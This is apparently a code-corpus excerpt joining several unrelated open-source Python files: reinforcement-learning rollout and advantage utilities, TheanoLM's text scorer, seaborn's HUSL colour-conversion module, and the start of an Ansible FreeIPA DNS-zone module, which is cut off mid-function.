      ValueError: If self.terminated is already True, meaning that the episode
has already ended.
"""
if len(states) != len(actions):
raise ValueError(
'Number of states and actions must be the same. Got %d states and '
'%d actions' % (len(states), len(actions)))
if len(states) != len(rewards):
raise ValueError(
'Number of states and rewards must be the same. Got %d states and '
'%d rewards' % (len(states), len(rewards)))
if values is not None and len(states) != len(values):
raise ValueError(
'Number of states and values must be the same. Got %d states and '
'%d values' % (len(states), len(values)))
if self.terminated:
raise ValueError(
'Trying to add timesteps to an already terminal rollout.')
self.states += states
self.actions += actions
self.rewards += rewards
self.values += values if values is not None else [0.0] * len(states)
self.terminated = terminated
self.total_reward += sum(rewards)
def extend(self, other):
"""Append another rollout to this rollout."""
assert not self.terminated
self.states.extend(other.states)
self.actions.extend(other.actions)
self.rewards.extend(other.rewards)
self.values.extend(other.values)
self.terminated = other.terminated
self.total_reward += other.total_reward
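# Illustrative usage sketch (added for clarity; the states, actions, and
# rewards below are hypothetical placeholders, not part of the original
# module). A real agent would record values observed from its environment.
def _example_rollout_usage():
  """Builds a tiny two-step rollout and returns it."""
  ro = Rollout()
  ro.add(state=[0.0], action=1, reward=0.0, value=0.5)
  ro.add(state=[1.0], action=0, reward=1.0, value=0.4, terminated=True)
  # total_reward accumulates as timesteps are added; terminated marks the
  # episode as complete so the rollout can later be processed into a batch.
  assert ro.terminated and ro.total_reward == 1.0
  return ro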
def discount(x, gamma):
"""Returns discounted sums for each value in x, with discount factor gamma.
This can be used to compute the return (discounted sum of rewards) at each
timestep given a sequence of rewards. See the definitions for return and
REINFORCE in section 3 of https://arxiv.org/pdf/1602.01783.pdf.
Let g^k mean gamma ** k.
For list [x_0, ..., x_N], the following list of discounted sums is computed:
[x_0 + g^1 * x_1 + g^2 * x_2 + ... g^N * x_N,
x_1 + g^1 * x_2 + g^2 * x_3 + ... g^(N-1) * x_N,
x_2 + g^1 * x_3 + g^2 * x_4 + ... g^(N-2) * x_N,
...,
x_(N-1) + g^1 * x_N,
x_N]
Args:
x: List of numbers [x_0, ..., x_N].
gamma: Float between 0 and 1 (inclusive). This is the discount factor.
Returns:
List of discounted sums.
"""
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
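# Worked example (hypothetical numbers, added for illustration): with
# gamma = 0.5 and x = [1.0, 1.0, 1.0], the discounted sums are
# [1 + 0.5 + 0.25, 1 + 0.5, 1] = [1.75, 1.5, 1.0].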
def discounted_advantage_and_rewards(rewards, values, gamma, lambda_=1.0):
"""Compute advantages and returns (discounted sum of rewards).
For an episode of length T, rewards = [r_0, ..., r_(T-1)].
Each reward r_t is observed after taking action a_t at state s_t. A final
state s_T is observed but no reward is given at this state since no action
a_T is taken (otherwise there would be a new state s_(T+1)).
`rewards` and `values` are for a single episode. Return R_t is the discounted
sum of future rewards starting at time t, where `gamma` is the discount
factor.
R_t = r_t + gamma * r_(t+1) + gamma**2 * r_(t+2) + ...
+ gamma**(T-1-t) * r_(T-1)
Advantage A(a_t, s_t) is approximated by computing A(a_t, s_t) = R_t - V(s_t)
where V(s_t) is an approximation of the value at that state, given in the
`values` list. Returns R_t are needed for all REINFORCE algorithms. Advantage
is used for the advantage actor critic variant of REINFORCE.
See algorithm S3 in https://arxiv.org/pdf/1602.01783.pdf.
Additionally another parameter `lambda_` controls the bias-variance tradeoff.
See "Generalized Advantage Estimation": https://arxiv.org/abs/1506.02438.
lambda_ = 1 reduces to regular advantage.
0 <= lambda_ < 1 trades off variance for bias, with lambda_ = 0 being the
most biased.
Bootstrapping is also supported. If an episode does not end in a terminal
state (either because the episode was ended early, or the environment does not
have end states), the true return cannot be computed from the rewards alone.
However, it can be estimated by computing the value (an approximation of
return) of the last state s_T. Thus the `values` list will have an extra item:
values = [V(s_0), ..., V(s_(T-1)), V(s_T)].
Args:
rewards: List of observed rewards [r_0, ..., r_(T-1)].
values: List of estimated values [V(s_0), ..., V(s_(T-1))] with an optional
extra V(s_T) item.
gamma: Discount factor. Number between 0 and 1. 1 means no discount.
If not 1, gamma is typically near 1, like 0.99.
lambda_: Bias-variance tradeoff factor. Between 0 and 1.
Returns:
empirical_values: Returns at each timestep.
    generalized_advantage: Advantages at each timestep.
Raises:
ValueError: If shapes of `rewards` and `values` are not rank 1.
ValueError: If len(values) not in (len(rewards), len(rewards) + 1).
"""
rewards = np.asarray(rewards, dtype=np.float32)
values = np.asarray(values, dtype=np.float32)
if rewards.ndim != 1:
raise ValueError('Single episode only. rewards must be rank 1.')
if values.ndim != 1:
raise ValueError('Single episode only. values must be rank 1.')
if len(values) == len(rewards):
# No bootstrapping.
values = np.append(values, 0)
empirical_values = discount(rewards, gamma)
elif len(values) == len(rewards) + 1:
# With bootstrapping.
# Last value is for the terminal state (final state after last action was
# taken).
empirical_values = discount(np.append(rewards, values[-1]), gamma)[:-1]
else:
raise ValueError('values should contain the same number of items or one '
'more item than rewards')
delta = rewards + gamma * values[1:] - values[:-1]
generalized_advantage = discount(delta, gamma * lambda_)
# empirical_values is the discounted sum of rewards into the future.
# generalized_advantage is the target for each policy update.
return empirical_values, generalized_advantage
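# Worked example (hypothetical numbers, added for illustration): with
# rewards = [0.0, 0.0, 1.0], values = [0.5, 0.5, 0.5] (no bootstrap value),
# gamma = 1.0 and lambda_ = 1.0, the returns are [1.0, 1.0, 1.0] and the
# generalized advantages reduce to R_t - V(s_t) = [0.5, 0.5, 0.5].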
"""Batch holds a minibatch of episodes.
Let bi = batch_index, i.e. the index of each episode in the minibatch.
Let t = time.
Attributes:
states: States for each timestep in each episode. Indexed by states[bi, t].
actions: Actions for each timestep in each episode. Indexed by actions[bi, t].
discounted_adv: Advantages (computed by discounted_advantage_and_rewards)
for each timestep in each episode. Indexed by discounted_adv[bi, t].
discounted_r: Returns (discounted sum of rewards computed by
discounted_advantage_and_rewards) for each timestep in each episode.
Indexed by discounted_r[bi, t].
total_rewards: Total reward for each episode, i.e. sum of rewards across all
timesteps (not discounted). Indexed by total_rewards[bi].
episode_lengths: Number of timesteps in each episode. If an episode has
N actions, N rewards, and N states, then its length is N. Indexed by
episode_lengths[bi].
batch_size: Number of episodes in this minibatch. An integer.
max_time: Maximum episode length in the batch. An integer.
""" # pylint: disable=pointless-string-statement
Batch = namedtuple(
'Batch',
['states', 'actions', 'discounted_adv', 'discounted_r', 'total_rewards',
'episode_lengths', 'batch_size', 'max_time'])
def process_rollouts(rollouts, gamma, lambda_=1.0):
"""Convert a batch of rollouts into tensors ready to be fed into a model.
Lists from each episode are stacked into 2D tensors and padded with 0s up to
the maximum timestep in the batch.
Args:
rollouts: A list of Rollout instances.
gamma: The discount factor. A number between 0 and 1 (inclusive). See gamma
argument in discounted_advantage_and_rewards.
lambda_: See lambda_ argument in discounted_advantage_and_rewards.
Returns:
Batch instance. states, actions, discounted_adv, and discounted_r are
numpy arrays with shape (batch_size, max_episode_length). episode_lengths
is a list of ints. total_rewards is a list of floats (total reward in each
episode). batch_size and max_time are ints.
Raises:
ValueError: If any of the rollouts are not terminal.
"""
for ro in rollouts:
if not ro.terminated:
raise ValueError('Can only process terminal rollouts.')
episode_lengths = [len(ro.states) for ro in rollouts]
batch_size = len(rollouts)
max_time = max(episode_lengths)
states = utils.stack_pad([ro.states for ro in rollouts], 0, max_time)
actions = utils.stack_pad([ro.actions for ro in rollouts], 0, max_time)
discounted_rewards = [None] * batch_size
discounted_adv = [None] * batch_size
for i, ro in enumerate(rollouts):
disc_r, disc_adv = discounted_advantage_and_rewards(
ro.rewards, ro.values, gamma, lambda_)
discounted_rewards[i] = disc_r
discounted_adv[i] = disc_adv
discounted_rewards = utils.stack_pad(discounted_rewards, 0, max_time)
discounted_adv = utils.stack_pad(discounted_adv, 0, max_time)
total_rewards = [sum(ro.rewards) for ro in rollouts]
return Batch(states=states,
actions=actions,
discounted_adv=discounted_adv,
discounted_r=discounted_rewards,
total_rewards=total_rewards,
episode_lengths=episode_lengths,
batch_size=batch_size,
max_time=max_time)
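# Illustrative note (added): for two terminal rollouts of lengths 3 and 5
# with scalar states, the resulting batch has batch_size = 2, max_time = 5,
# episode_lengths = [3, 5], and states/actions/discounted_r/discounted_adv
# padded with zeros out to shape (2, 5).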
| apache-2.0 | -660,331,608,922,952,800 | 38.513072 | 80 | 0.680341 | false |
senarvi/theanolm | theanolm/scoring/textscorer.py | 1 | 18475 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""A module that implements the TextScorer class.
"""
import logging
import numpy
import theano
import theano.tensor as tensor
from theanolm.backend import NumberError
from theanolm.backend import test_value
from theanolm.parsing import utterance_from_line
class TextScorer(object):
"""Text Scoring Using a Neural Network Language Model
"""
def __init__(self, network, use_shortlist=True, exclude_unk=False,
profile=False):
"""Creates two Theano function, ``self._target_logprobs_function()``,
which computes the log probabilities predicted by the neural network for
the words in a mini-batch, and ``self._total_logprob_function()``, which
returns the total log probability.
Both functions take as arguments four matrices:
1. Word IDs in the shape of a mini-batch. The functions will only use
the input words (not the last time step).
2. Class IDs in the shape of a mini-batch. The functions will slice this
into input and output.
3. Class membership probabilities in the shape of a mini-batch, but only
for the output words (not the first time step).
4. Mask in the shape of a mini-batch, but only for the output words (not
for the first time step).
``self._target_logprobs_function()`` will return a matrix of predicted
log probabilities for the output words (excluding the first time step)
and the mask. ``<unk>`` tokens are also masked out if ``exclude_unk`` is
set to ``True``. ``self._total_logprob_function()`` will return the
total log probability of the predicted (unmasked) words and the number
of those words.
:type network: Network
:param network: the neural network object
:type use_shortlist: bool
:param use_shortlist: if ``True``, the ``<unk>`` probability is
distributed among the out-of-shortlist words
:type exclude_unk: bool
:param exclude_unk: if set to ``True``, ``<unk>`` tokens are excluded
from probability computation
:type profile: bool
:param profile: if set to True, creates a Theano profile object
"""
self._vocabulary = network.vocabulary
self._unk_id = self._vocabulary.word_to_id['<unk>']
# The functions take as input a mini-batch of word IDs and class IDs,
# and slice input and target IDs for the network.
batch_word_ids = tensor.matrix('textscorer/batch_word_ids',
dtype='int64')
batch_word_ids.tag.test_value = test_value(
size=(21, 4), high=self._vocabulary.num_words())
batch_class_ids = tensor.matrix('textscorer/batch_class_ids',
dtype='int64')
batch_class_ids.tag.test_value = test_value(
size=(21, 4), high=self._vocabulary.num_classes())
membership_probs = tensor.matrix('textscorer/membership_probs',
dtype=theano.config.floatX)
membership_probs.tag.test_value = test_value(
size=(20, 4), high=1.0)
# Convert out-of-shortlist words to <unk> in input.
shortlist_size = self._vocabulary.num_shortlist_words()
input_word_ids = batch_word_ids[:-1]
oos_indices = tensor.ge(input_word_ids, shortlist_size).nonzero()
input_word_ids = tensor.set_subtensor(input_word_ids[oos_indices],
self._unk_id)
# Out-of-shortlist words are already in <unk> class, because they don't
# have own classes.
input_class_ids = batch_class_ids[:-1]
target_class_ids = batch_class_ids[1:]
# Target word IDs are not used by the network. We need them to compute
# probabilities for out-of-shortlist word.
target_word_ids = batch_word_ids[1:]
logprobs = tensor.log(network.target_probs())
# Add logprobs from the class membership of the predicted word.
logprobs += tensor.log(membership_probs)
mask = network.mask
if use_shortlist and network.oos_logprobs is not None:
# The probability of out-of-shortlist words (which is the <unk>
# probability) is multiplied by the fraction of the actual word
# within the set of OOS words.
logprobs += network.oos_logprobs[target_word_ids]
# Always exclude OOV words when using a shortlist - No probability
# mass is left for them.
mask *= tensor.neq(target_word_ids, self._unk_id)
elif exclude_unk:
# If requested, ignore OOS and OOV probabilities.
mask *= tensor.neq(target_word_ids, self._unk_id)
mask *= tensor.lt(target_word_ids, shortlist_size)
        # Ignore unused input variables, because is_training is only used by
        # the dropout layer.
masked_logprobs = logprobs * tensor.cast(mask, theano.config.floatX)
self._target_logprobs_function = theano.function(
[batch_word_ids, batch_class_ids, membership_probs, network.mask],
[masked_logprobs, mask],
givens=[(network.input_word_ids, input_word_ids),
(network.input_class_ids, input_class_ids),
(network.target_class_ids, target_class_ids),
(network.is_training, numpy.int8(0))],
name='target_logprobs',
on_unused_input='ignore',
profile=profile)
# If some word is not in the training data, its class membership
# probability will be zero. We want to ignore those words. Multiplying
# by the mask is not possible, because those logprobs will be -inf.
mask *= tensor.neq(membership_probs, 0.0)
masked_logprobs = tensor.switch(mask, logprobs, 0.0)
self._total_logprob_function = theano.function(
[batch_word_ids, batch_class_ids, membership_probs, network.mask],
[masked_logprobs.sum(), mask.sum()],
givens=[(network.input_word_ids, input_word_ids),
(network.input_class_ids, input_class_ids),
(network.target_class_ids, target_class_ids),
(network.is_training, numpy.int8(0))],
name='total_logprob',
on_unused_input='ignore',
profile=profile)
# These are updated by score_line().
self.num_words = 0
self.num_unks = 0
def score_batch(self, word_ids, class_ids, membership_probs, mask):
"""Computes the log probabilities predicted by the neural network for
the words in a mini-batch.
The result will be returned in a list of lists. The indices will be a
transpose of those of the input matrices, so that the first index is the
sequence, not the time step. The lists will contain ``None`` values in
place of any ``<unk>`` tokens, if the constructor was given
``exclude_unk=True``. When using a shortlist, the lists will always
contain ``None`` in place of OOV words, and if ``exclude_unk=True`` was
given, also in place of OOS words. Words with zero class membership
probability will have ``-inf`` log probability.
:type word_ids: numpy.ndarray of an integer type
:param word_ids: a 2-dimensional matrix, indexed by time step and
sequence, that contains the word IDs
:type class_ids: numpy.ndarray of an integer type
:param class_ids: a 2-dimensional matrix, indexed by time step and
sequence, that contains the class IDs
:type membership_probs: numpy.ndarray of a floating point type
:param membership_probs: a 2-dimensional matrix, indexed by time step
and sequences, that contains the class
membership probabilities of the words
:type mask: numpy.ndarray of a floating point type
:param mask: a 2-dimensional matrix, indexed by time step and sequence,
that masks out elements past the sequence ends
:rtype: list of lists
:returns: logprob of each word in each sequence, ``None`` values
indicating excluded <unk> tokens
"""
result = []
membership_probs = membership_probs.astype(theano.config.floatX)
# target_logprobs_function() uses the word and class IDs of the entire
# mini-batch, but membership probs and mask are only for the output.
logprobs, new_mask = self._target_logprobs_function(word_ids,
class_ids,
membership_probs[1:],
mask[1:])
for seq_index in range(logprobs.shape[1]):
seq_mask = mask[1:, seq_index]
seq_logprobs = logprobs[seq_mask == 1, seq_index]
# The new mask also masks excluded tokens, replace those with None.
seq_mask = new_mask[seq_mask == 1, seq_index]
seq_logprobs = [lp if m == 1 else None
for lp, m in zip(seq_logprobs, seq_mask)]
result.append(seq_logprobs)
return result
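    # Illustrative note (added): for a mini-batch of two sequences, the value
    # returned above is indexed as result[sequence][time]; e.g. result[0]
    # lists the log probabilities of the first sequence's output words, with
    # None in place of any excluded <unk> or out-of-shortlist words.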
def compute_perplexity(self, batch_iter):
"""Computes the perplexity of text read using the given iterator.
``batch_iter`` is an iterator to the input data. On each call it creates
        two 2-dimensional matrices, both indexed by time step and sequence.
The first matrix contains the word IDs, the second one masks out
elements past the sequence ends.
``<unk>`` tokens will be excluded from the perplexity computation, if
the constructor was given ``exclude_unk=True``. When using a shortlist,
OOV words are always excluded, and if ``exclude_unk=True`` was given,
OOS words are also excluded. Words with zero class membership
probability are always excluded.
:type batch_iter: BatchIterator
:param batch_iter: an iterator that creates mini-batches from the input
data
:rtype: float
:returns: perplexity, i.e. exponent of negative log probability
normalized by the number of words
"""
logprob = 0
num_words = 0
for word_ids, _, mask in batch_iter:
class_ids, membership_probs = \
self._vocabulary.get_class_memberships(word_ids)
membership_probs = membership_probs.astype(theano.config.floatX)
# total_logprob_function() uses the word and class IDs of the entire
# mini-batch, but membership probs and mask are only for the output.
batch_logprob, batch_num_words = \
self._total_logprob_function(word_ids,
class_ids,
membership_probs[1:],
mask[1:])
if numpy.isnan(batch_logprob):
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Log probability of a mini-batch is NaN.")
if numpy.isneginf(batch_logprob):
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Probability of a mini-batch is zero.")
if batch_logprob > 0.0:
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Probability of a mini-batch is greater than one.")
logprob += batch_logprob
num_words += batch_num_words
if num_words == 0:
raise ValueError("Zero words for computing perplexity. Does the "
"evaluation data contain only OOV words?")
cross_entropy = -logprob / num_words
return numpy.exp(cross_entropy)
def score_sequence(self, word_ids, class_ids, membership_probs):
"""Computes the log probability of a word sequence.
``<unk>`` tokens will be excluded from the probability computation, if
the constructor was given ``exclude_unk=True``. When using a shortlist,
OOV words are always excluded, and if ``exclude_unk=True`` was given,
OOS words are also excluded. Words with zero class membership
probability are always excluded.
:type word_ids: ndarray
:param word_ids: a vector of word IDs
:type class_ids: list of ints
:param class_ids: corresponding class IDs
:type membership_probs: list of floats
:param membership_probs: list of class membership probabilities
:rtype: float
:returns: log probability of the word sequence
"""
# Create 2-dimensional matrices representing the transposes of the
# vectors.
word_ids = numpy.transpose(word_ids[numpy.newaxis])
class_ids = numpy.array([[x] for x in class_ids], numpy.int64)
membership_probs = numpy.array(
[[x] for x in membership_probs]).astype(theano.config.floatX)
# Mask used by the network is all ones.
mask = numpy.ones(word_ids.shape, numpy.int8)
# total_logprob_function() uses the word and class IDs of the entire
# mini-batch, but membership probs and mask are only for the output.
logprob, _ = self._total_logprob_function(word_ids,
class_ids,
membership_probs[1:],
mask[1:])
if numpy.isnan(logprob):
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Log probability of a sequence is NaN.")
if numpy.isneginf(logprob):
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Probability of a sequence is zero.")
if logprob > 0.0:
self._debug_log_batch(word_ids, class_ids, membership_probs, mask)
raise NumberError("Probability of a sequence is greater than one.")
return logprob
def score_line(self, line, vocabulary):
"""Scores a line of text.
        Start-of-sentence and end-of-sentence tags (``<s>`` and ``</s>``) will be
inserted at the beginning and the end of the line, if they're missing.
If the line is empty, ``None`` will be returned, instead of interpreting
it as the empty sentence ``<s> </s>``.
``<unk>`` tokens will be excluded from the probability computation, if
the constructor was given ``exclude_unk=True``. When using a shortlist,
OOV words are always excluded, and if ``exclude_unk=True`` was given,
OOS words are also excluded. Words with zero class membership
probability are always excluded.
:type line: str
:param line: a sequence of words
:type vocabulary: Vocabulary
:param vocabulary: vocabulary for converting the words to word IDs
:rtype: float
:returns: log probability of the word sequence, or None if the line is
empty
"""
words = utterance_from_line(line)
if not words:
return None
word_ids = vocabulary.words_to_ids(words)
unk_id = vocabulary.word_to_id['<unk>']
self.num_words += word_ids.size
self.num_unks += numpy.count_nonzero(word_ids == unk_id)
class_ids = [vocabulary.word_id_to_class_id[word_id]
for word_id in word_ids]
probs = [vocabulary.get_word_prob(word_id)
for word_id in word_ids]
return self.score_sequence(word_ids, class_ids, probs)
def _debug_log_batch(self, word_ids, class_ids, membership_probs, mask):
"""Writes the target word IDs, their log probabilities, and the mask to
the debug log.
:type word_ids: numpy.ndarray of an integer type
:param word_ids: a 2-dimensional matrix, indexed by time step and
sequence, that contains the word IDs
:type class_ids: numpy.ndarray of an integer type
:param class_ids: a 2-dimensional matrix, indexed by time step and
sequence, that contains the class IDs
:type membership_probs: numpy.ndarray of a floating point type
:param membership_probs: a 2-dimensional matrix, indexed by time step
and sequences, that contains the class
membership probabilities of the words
:type mask: numpy.ndarray of a floating point type
:param mask: a 2-dimensional matrix, indexed by time step and sequence,
that masks out elements past the sequence ends
"""
membership_probs = membership_probs.astype(theano.config.floatX)
# target_logprobs_function() uses the word and class IDs of the entire
# mini-batch, but membership probs and mask are only for the output.
logprobs, new_mask = self._target_logprobs_function(word_ids,
class_ids,
membership_probs[1:],
mask[1:])
for seq_index in range(logprobs.shape[1]):
target_word_ids = word_ids[1:, seq_index]
seq_mask = mask[1:, seq_index]
seq_word_ids = target_word_ids[seq_mask == 1]
seq_logprobs = logprobs[seq_mask == 1, seq_index]
# The new mask also masks excluded tokens.
seq_mask = new_mask[seq_mask == 1, seq_index]
logging.debug("Sequence %i target word IDs: [%s]",
seq_index, ", ".join(str(x) for x in seq_word_ids))
logging.debug("Sequence %i mask: [%s]",
seq_index, ", ".join(str(x) for x in seq_mask))
logging.debug("Sequence %i logprobs: [%s]",
seq_index, ", ".join(str(x) for x in seq_logprobs))
| apache-2.0 | -205,964,645,865,236,260 | 46.615979 | 85 | 0.593126 | false |
dhimmel/seaborn | seaborn/external/husl.py | 35 | 6661 | import operator
import math
__version__ = "2.1.0"
m = [
[3.2406, -1.5372, -0.4986],
[-0.9689, 1.8758, 0.0415],
[0.0557, -0.2040, 1.0570]
]
m_inv = [
[0.4124, 0.3576, 0.1805],
[0.2126, 0.7152, 0.0722],
[0.0193, 0.1192, 0.9505]
]
# Hard-coded D65 illuminant
refX = 0.95047
refY = 1.00000
refZ = 1.08883
refU = 0.19784
refV = 0.46834
lab_e = 0.008856
lab_k = 903.3
# Public API
def husl_to_rgb(h, s, l):
return lch_to_rgb(*husl_to_lch([h, s, l]))
def husl_to_hex(h, s, l):
return rgb_to_hex(husl_to_rgb(h, s, l))
def rgb_to_husl(r, g, b):
return lch_to_husl(rgb_to_lch(r, g, b))
def hex_to_husl(hex):
return rgb_to_husl(*hex_to_rgb(hex))
def huslp_to_rgb(h, s, l):
return lch_to_rgb(*huslp_to_lch([h, s, l]))
def huslp_to_hex(h, s, l):
return rgb_to_hex(huslp_to_rgb(h, s, l))
def rgb_to_huslp(r, g, b):
return lch_to_huslp(rgb_to_lch(r, g, b))
def hex_to_huslp(hex):
return rgb_to_huslp(*hex_to_rgb(hex))
def lch_to_rgb(l, c, h):
return xyz_to_rgb(luv_to_xyz(lch_to_luv([l, c, h])))
def rgb_to_lch(r, g, b):
return luv_to_lch(xyz_to_luv(rgb_to_xyz([r, g, b])))
def max_chroma(L, H):
hrad = math.radians(H)
sinH = (math.sin(hrad))
cosH = (math.cos(hrad))
sub1 = (math.pow(L + 16, 3.0) / 1560896.0)
sub2 = sub1 if sub1 > 0.008856 else (L / 903.3)
result = float("inf")
for row in m:
m1 = row[0]
m2 = row[1]
m3 = row[2]
top = ((0.99915 * m1 + 1.05122 * m2 + 1.14460 * m3) * sub2)
rbottom = (0.86330 * m3 - 0.17266 * m2)
lbottom = (0.12949 * m3 - 0.38848 * m1)
bottom = (rbottom * sinH + lbottom * cosH) * sub2
for t in (0.0, 1.0):
C = (L * (top - 1.05122 * t) / (bottom + 0.17266 * sinH * t))
if C > 0.0 and C < result:
result = C
return result
def _hrad_extremum(L):
lhs = (math.pow(L, 3.0) + 48.0 * math.pow(L, 2.0) + 768.0 * L + 4096.0) / 1560896.0
rhs = 1107.0 / 125000.0
sub = lhs if lhs > rhs else 10.0 * L / 9033.0
chroma = float("inf")
result = None
for row in m:
for limit in (0.0, 1.0):
[m1, m2, m3] = row
top = -3015466475.0 * m3 * sub + 603093295.0 * m2 * sub - 603093295.0 * limit
bottom = 1356959916.0 * m1 * sub - 452319972.0 * m3 * sub
hrad = math.atan2(top, bottom)
# This is a math hack to deal with tan quadrants, I'm too lazy to figure
# out how to do this properly
if limit == 0.0:
hrad += math.pi
test = max_chroma(L, math.degrees(hrad))
if test < chroma:
chroma = test
result = hrad
return result
def max_chroma_pastel(L):
H = math.degrees(_hrad_extremum(L))
return max_chroma(L, H)
def dot_product(a, b):
return sum(map(operator.mul, a, b))
def f(t):
if t > lab_e:
return (math.pow(t, 1.0 / 3.0))
else:
return (7.787 * t + 16.0 / 116.0)
def f_inv(t):
if math.pow(t, 3.0) > lab_e:
return (math.pow(t, 3.0))
else:
return (116.0 * t - 16.0) / lab_k
def from_linear(c):
if c <= 0.0031308:
return 12.92 * c
else:
return (1.055 * math.pow(c, 1.0 / 2.4) - 0.055)
def to_linear(c):
a = 0.055
if c > 0.04045:
return (math.pow((c + a) / (1.0 + a), 2.4))
else:
return (c / 12.92)
def rgb_prepare(triple):
ret = []
for ch in triple:
ch = round(ch, 3)
if ch < -0.0001 or ch > 1.0001:
raise Exception("Illegal RGB value %f" % ch)
if ch < 0:
ch = 0
if ch > 1:
ch = 1
        # Python 3 rounds 4.5 down to 4.0 (banker's rounding) while Python 2
        # rounds it up to 5.0, which caused a couple of off-by-one errors in
        # the tests. Adding a small epsilon before rounding keeps the result
        # consistent, so the tests now pass on both Python 2 and Python 3.
ret.append(round(ch * 255 + 0.001, 0))
return ret
def hex_to_rgb(hex):
if hex.startswith('#'):
hex = hex[1:]
r = int(hex[0:2], 16) / 255.0
g = int(hex[2:4], 16) / 255.0
b = int(hex[4:6], 16) / 255.0
return [r, g, b]
def rgb_to_hex(triple):
[r, g, b] = triple
return '#%02x%02x%02x' % tuple(rgb_prepare([r, g, b]))
def xyz_to_rgb(triple):
xyz = map(lambda row: dot_product(row, triple), m)
return list(map(from_linear, xyz))
def rgb_to_xyz(triple):
rgbl = list(map(to_linear, triple))
return list(map(lambda row: dot_product(row, rgbl), m_inv))
def xyz_to_luv(triple):
X, Y, Z = triple
if X == Y == Z == 0.0:
return [0.0, 0.0, 0.0]
varU = (4.0 * X) / (X + (15.0 * Y) + (3.0 * Z))
varV = (9.0 * Y) / (X + (15.0 * Y) + (3.0 * Z))
L = 116.0 * f(Y / refY) - 16.0
# Black will create a divide-by-zero error
if L == 0.0:
return [0.0, 0.0, 0.0]
U = 13.0 * L * (varU - refU)
V = 13.0 * L * (varV - refV)
return [L, U, V]
def luv_to_xyz(triple):
L, U, V = triple
if L == 0:
return [0.0, 0.0, 0.0]
varY = f_inv((L + 16.0) / 116.0)
varU = U / (13.0 * L) + refU
varV = V / (13.0 * L) + refV
Y = varY * refY
X = 0.0 - (9.0 * Y * varU) / ((varU - 4.0) * varV - varU * varV)
Z = (9.0 * Y - (15.0 * varV * Y) - (varV * X)) / (3.0 * varV)
return [X, Y, Z]
def luv_to_lch(triple):
L, U, V = triple
C = (math.pow(math.pow(U, 2) + math.pow(V, 2), (1.0 / 2.0)))
hrad = (math.atan2(V, U))
H = math.degrees(hrad)
if H < 0.0:
H = 360.0 + H
return [L, C, H]
def lch_to_luv(triple):
L, C, H = triple
Hrad = math.radians(H)
U = (math.cos(Hrad) * C)
V = (math.sin(Hrad) * C)
return [L, U, V]
def husl_to_lch(triple):
H, S, L = triple
if L > 99.9999999:
return [100, 0.0, H]
if L < 0.00000001:
return [0.0, 0.0, H]
mx = max_chroma(L, H)
C = mx / 100.0 * S
return [L, C, H]
def lch_to_husl(triple):
L, C, H = triple
if L > 99.9999999:
return [H, 0.0, 100.0]
if L < 0.00000001:
return [H, 0.0, 0.0]
mx = max_chroma(L, H)
S = C / mx * 100.0
return [H, S, L]
def huslp_to_lch(triple):
H, S, L = triple
if L > 99.9999999:
return [100, 0.0, H]
if L < 0.00000001:
return [0.0, 0.0, H]
mx = max_chroma_pastel(L)
C = mx / 100.0 * S
return [L, C, H]
def lch_to_huslp(triple):
L, C, H = triple
if L > 99.9999999:
return [H, 0.0, 100.0]
if L < 0.00000001:
return [H, 0.0, 0.0]
mx = max_chroma_pastel(L)
S = C / mx * 100.0
return [H, S, L]
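# Illustrative usage sketch (added; the numbers are approximate and not taken
# from this module's tests): rgb_to_husl(1.0, 0.0, 0.0) maps pure red to
# roughly [12.2, 100.0, 53.2] (hue in degrees, saturation and lightness in
# percent), and husl_to_hex(12.2, 100.0, 53.2) returns a hex string close
# to '#ff0000'.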
| bsd-3-clause | -4,404,592,821,798,283,000 | 20.28115 | 89 | 0.498724 | false |
garbled1/ansible | lib/ansible/modules/identity/ipa/ipa_dnszone.py | 16 | 4987 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Fran Fitzpatrick ([email protected])
# Borrowed heavily from other work by Abhijeet Kasurde ([email protected])
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ipa_dnszone
author: Fran Fitzpatrick (@fxfitz)
short_description: Manage FreeIPA DNS Zones
description:
- Add and delete an IPA DNS Zones using IPA API
options:
zone_name:
description:
    - The DNS zone name that needs to be managed.
required: true
state:
description: State to ensure
required: false
default: present
choices: ["present", "absent"]
ipa_port:
description: Port of IPA server
required: false
default: 443
ipa_host:
description: IP or hostname of IPA server
required: false
default: localhost
ipa_user:
description: Administrative account used on IPA server
required: false
default: admin
ipa_pass:
description: Password of administrative user
required: true
ipa_prot:
description: Protocol used by IPA server
required: false
default: https
choices: ["http", "https"]
validate_certs:
description:
- This only applies if C(ipa_prot) is I(https).
- If set to C(no), the SSL certificates will not be validated.
- This should only set to C(no) used on personally controlled sites using self-signed certificates.
required: false
default: true
version_added: "2.5"
'''
EXAMPLES = '''
# Ensure dns zone is present
- ipa_dnszone:
ipa_host: spider.example.com
ipa_pass: Passw0rd!
state: present
zone_name: example.com
# Ensure that dns zone is removed
- ipa_dnszone:
zone_name: example.com
ipa_host: localhost
ipa_user: admin
ipa_pass: topsecret
state: absent
'''
RETURN = '''
zone:
description: DNS zone as returned by IPA API.
returned: always
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ipa import IPAClient
from ansible.module_utils._text import to_native
class DNSZoneIPAClient(IPAClient):
def __init__(self, module, host, port, protocol):
super(DNSZoneIPAClient, self).__init__(module, host, port, protocol)
def dnszone_find(self, zone_name):
return self._post_json(
method='dnszone_find',
name=zone_name,
item={'idnsname': zone_name}
)
def dnszone_add(self, zone_name=None, details=None):
return self._post_json(
method='dnszone_add',
name=zone_name,
item={}
)
def dnszone_del(self, zone_name=None, record_name=None, details=None):
return self._post_json(
method='dnszone_del', name=zone_name, item={})
def ensure(module, client):
zone_name = module.params['zone_name']
state = module.params['state']
ipa_dnszone = client.dnszone_find(zone_name)
changed = False
if state == 'present':
if not ipa_dnszone:
changed = True
if not module.check_mode:
client.dnszone_add(zone_name=zone_name)
else:
changed = False
else:
if ipa_dnszone:
changed = True
if not module.check_mode:
